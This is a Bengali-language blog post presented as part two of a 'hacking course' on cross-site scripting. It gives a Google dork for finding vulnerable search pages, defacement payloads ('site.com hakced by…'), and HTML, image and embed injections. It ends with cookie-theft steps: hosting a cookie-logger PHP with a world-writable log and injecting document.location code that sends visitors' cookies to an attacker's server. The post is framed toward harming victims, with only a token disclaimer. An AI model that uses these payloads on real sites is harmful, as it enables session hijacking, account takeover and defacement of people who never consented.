হ্যাকিং শিক্ষাঃ- প্রথম পর্ব+ দ্বিতীয় পর্ব

সাগ্বতম! আপনাকে হ্যাকিং শিক্ষা কোর্স দ্বিতীয় পর্বে!

যার যারা প্রথম পর্ব দেখেন নি তারা এখান  থেকে দেখে নিন প্রথম পর্বঃ-  অথবা,  নিচে থেকে  সরাসরি দেখুন 

হ্যাকিং শিক্ষাঃ- প্রথম পর্ব ! 

আজকের পর্বের বিষয়ঃ-  XSS (Crose Site Scrioting) 

নোটীশঃ- প্রতিটি লিখা বা পর্ব আনলাইন এর আনাচে কানাচে থেকে সংগ্রহ করা হবে এবং নিচে লেখক এর ক্রেডিট দেওায়া হবে। কখন ও ইংলিশ ব্লগ থেকে কপি করে ট্রাস্লেট করা হবে। ফলে বুজে নিতে হবে  😛 এবং কিছু কিছু লিখালেখক  এর নিজের থাকবে এবং একান্ত নিজের মতামত ! তাই আপনার সাথে না ও মিলতে পারে।

XSS কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড।  সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি।  😈

XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়।

XSS Vulnerabilities খুঁজে বের করাঃ-একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি carking  করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।

inurl:"search.php?q=" তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন।  😯

XSS প্রাথমিক আলোচনাঃ-  XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে।

Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল <script>alert("XSS")</script>

আপনি ভিকটিমের সাইটটি যদি vulnerable  হল, তাহলে এই কোডটি দেয়ার পর একটি পপ-আপ মেনু আসবে। যদি কাজ হয়ে যায়, তাহলে আপনি আরও যুক্ত করতে পারবেন। <script>alert("site.com hakced by ভুত বাবা")</script>
প্রথমে বলেছিলাম যে, crack  করতে না পারলে গুগল ডক ব্যবহার করার জন্য। তাই আমরা নিচের ডকটি ব্যবহার করব ভ্যালু বের করার জন্য। search.php?q= যদি আপনি কোন সাইট পান ভ্যালুএবল, তাহলে নিচের কোডটি প্রবেশ করান। ধরি, আপনি http://www.site.com এটির vulnerable পেয়েছেন। তাহলে টাইপ করুন www.site.com/search.php?q=<script>alert("site.com hakced by ভুত বাবা")</script> তাহলে  একটি পপ-আপ মেনু আসবে।    👿
যদি এটা কাজ না করে? injecting HTMl দিতে চেষ্টা করতে পারেন।  😉 তাহলে নিচের HTML কোডটি প্রবেশ করান। <h1>anything you want</h1> <br><br><b><u>any thing you want</u></b> তাহলে আমার লিংক হবেwww.site.com/search.php?q= <h1>site.com hakced by ভুত বাবা</h1>www.site.com/search.php?q=<br><br><b><u>site.com hakced by ভুত বাবা</u></b>
এক্ষেত্রে আপনি আপনি যদি এখানে Bold লেখা দেখেন,তাহলে বুঝবেন এটা ভ্যালুয়েবল।  😆

ভিকটিম মারা পদ্ধতিঃ-

এতক্ষন দেখলাম  XSS এর কাজ করার পদ্ধতি। এখন এর  কয়েকটি জনপ্রিয় ম্যাথড দেখব ! 😛 

<html><body><IMG SRC="http://site.com/hacked.cyberking"></body></html> এছাড়াও আপনি আরেকটি কাজ করতে পারবেন IMG SCR এটা হল তাদের জন্য যারা HTML জানেন না তাদের জন্য। IMG SCR হল একটি ট্যাগ, এখানে দেয়া ছবিটি লিংক ওয়েবপেজে দেখাবে। এখন আমরা Shoutbox, Comment box বা যে কোন কিছু খুঁজে পেলাম। যা আপনার সাবমিট করাডাটাটি ওয়েবপেইজে দেখাবে। তবে এটা করলে আপনার ওয়েবপেজে শুধু মাত্র ছবির লিংকটি দেখাবে। <IMG SRC=""http://site.com/vuthBaba.png">তবে এটা করলে আপনার দেয়া ছবিটি ওয়েবপেজে বড় দেখাবে। এছাড়া আরেকটি ম্যাথড হল FLASH ভিডিও। <EMBED SRC="http://site.com/TJUnselected.swf"এবার একটি পপ-আপ দিন <script>window.open("http://www.site")</script>।

Cookie চুরি করার পদ্ধতিঃ-

প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন।।নোটঃ chmod  হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন। window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

অথবা:- 

 document.location = "http://yourServer.com/cookielogger.php?c="+document.cookieএবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.phpc=”+document.cookie  👿

আরো কিছু থাকলে মন্তভ্য এর মাধ্যমে জানবেন ক্রেডিট  ➡  Click Here  💡 

একটা কথাঃ- You Can Fool some of the people all the time, All the people some of the time, but you can not fool all the people All the time!  @Rizwan BIn Sulaiman 

উপদেশঃ–  হ্যাকিং জানার জন্য শিখে রাখুন। কার ক্ষতি করার জন্য নয়। হ্যা কোথায় কিছু অন্যায় ভাবে করলে সমস্যা হলে লেখক দায়ী নয়। নিজ দ্বায়িতে করুন। 👿 হ্যাকিং নিয়ে যে কোন প্রশ্ন করুনঃ-  arrow:  এখানে 

প্রথম প্রাকাশিতঃ- এখানে, হ্যাকিং নিয়ে সম্পূর্ণ কোর্স পেতে এখানে ক্লিক করুন 

যোগাযোগ করুনঃ- V43H B441     (রিকুয়েস্ট দিলে মেসেজ দিবেন নাইলে এক্সপেট হবার ভরসা নাই)   :mrgreen:

অপেক্ষা করুন ৩য়  পর্ব পর্যন্ত   ➡

জনস্বার্থে,  গ্রীন হ্যাট হ্যকার’স  (:arrow:   ফ্যান পেইজ)   (:arrow:  অফিসিয়াল গ্রুপ)

All Right Receved:-  Green INC  team 

 

Level 0

আমি আমি একজন ভাল ছেলে। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 18 টি টিউন ও 30 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

কিছু নাই


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস